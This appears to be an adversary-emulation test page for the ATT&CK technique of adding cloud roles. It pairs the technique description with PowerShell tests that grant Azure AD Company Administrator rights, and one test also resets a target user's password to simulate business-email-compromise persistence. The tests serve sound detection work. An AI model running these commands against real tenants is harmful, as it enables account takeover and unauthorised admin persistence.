T1098.003
Account Manipulation: Additional Cloud Roles
Description from ATT&CK
An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker) (Citation: Microsoft O365 Admin Roles)
This account modification may immediately follow Create Account or other malicious account activity. Adversaries may also modify existing Valid Accounts that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.
For example, in Azure AD environments, an adversary with the Application Administrator role can add Additional Cloud Credentials to their application's service principal. In doing so the adversary would be able to gain the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation) Similarly, in AWS environments, an adversary with appropriate permissions may be able to use the CreatePolicyVersion API to define a new version of an IAM policy or the AttachUserPolicy API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)
Similarly, an adversary with the Azure AD Global Administrator role can toggle the “Access management for Azure resources” option to gain the ability to assign privileged access to Azure subscriptions and virtual machines to Azure AD users, including themselves.(Citation: Azure AD to AD)
Atomic Tests
Atomic Test #1 - Azure AD - Add Company Administrator Role to a user
Add an existing Azure user account the Company Administrator Role.
Supported Platforms: azure-ad
auto_generated_guid: 4d77f913-56f5-4a14-b4b1-bf7bb24298ad
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Azure AD username | string | jonh@contoso.com |
| password | Azure AD password | string | p4sswd |
| target_user | Name of the user who will be assigned the Company Admin role | string | default |
Attack Commands: Run with powershell!
1
2
3
4
5
6
Import-Module MSOnline
$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
Connect-MsolService -Credential $Credential
Add-MsolRoleMember -RoleName "Company Administrator" -RoleMemberEmailAddress "#{target_user}"
Cleanup Commands:
1
2
Remove-MsolRoleMember -RoleName "Company Administrator" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
Dependencies: Run with powershell!
Description: MSOnline module must be installed.
Check Prereq Commands:
1
2
try {if (Get-InstalledModule -Name MSOnline -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
Get Prereq Commands:
1
2
Install-Module -Name MSOnline -Force
Atomic Test #2 - Simulate - Post BEC persistence via user password reset followed by user added to company administrator role
This test looks at simulating the an adversary described in the following blog post. It involves resetting the password of a normal user and adding to the company administrator role within M365. Reference: https://www.huntress.com/blog/business-email-compromise-via-azure-administrative-privileges
Supported Platforms: azure-ad
auto_generated_guid: 14f3af20-61f1-45b8-ad31-4637815f3f44
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| auth_username | Azure AD username used to conduct the adversary activity | string | jonh@contoso.com |
| auth_password | Azure AD password for user auth_username | string | p4sswd |
| target_user | Name of the user whose password be reset and added to the admin role. | string | default |
| target_password | The password that the user target_user will be reset to. | string | Ohn05GeMe#$ |
Attack Commands: Run with powershell!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Import-Module MSOnline
Import-Module AzureAD
$password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
$targetsecurepw = ConvertTo-SecureString -String "#{target_password}" -AsPlainText -Force
Connect-MsolService -Credential $credential -ErrorAction:SilentlyContinue
Connect-AzureAD -Credential $credential -ErrorAction:SilentlyContinue
#Saving the ObjectId of the target_user into a variable
$target_objid = Get-AzureADUser -filter "userPrincipalName eq '#{target_user}'" | Select-Object -ExpandProperty ObjectId
#Reset the password of the target_user
Set-AzureADUserPassword -ObjectId $target_objid -Password $targetsecurepw -ErrorAction:SilentlyContinue
#Adding target_user
Add-MsolRoleMember -RoleName "Company Administrator" -RoleMemberEmailAddress "#{target_user}"
Add-MsolRoleMember -RoleName "Global Reader" -RoleMemberEmailAddress "#{target_user}"
Cleanup Commands:
1
2
3
4
5
6
7
Import-Module MSOnline
$password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
Connect-MsolService -Credential $credential
Remove-MsolRoleMember -RoleName "Company Administrator" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
Remove-MsolRoleMember -RoleName "Global Reader" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
Dependencies: Run with powershell!
Description: MSOnline and AzureAD modules must be installed.
Check Prereq Commands:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$required_mods = 'AzureAD', 'MSOnline'
$installed_mods = @((Get-Module $required_mods -ListAvailable -ErrorAction SilentlyContinue).Name | Select-Object -Unique)
$notInstalled = Compare-Object $required_mods $installed_mods -PassThru -ErrorAction SilentlyContinue
if ($notInstalled) {
# Prompt for installing the missing ones.
Write-Output "The following PS modules aren't currently installed:"
$notInstalled
exit 1
}
else{
Write-Output "All required PS modules are installed"
exit 0
}
Get Prereq Commands:
1
2
3
Install-Module -Name MSOnline -Scope CurrentUser -Force
Install-Module -Name AzureAD -Scope CurrentUser -Force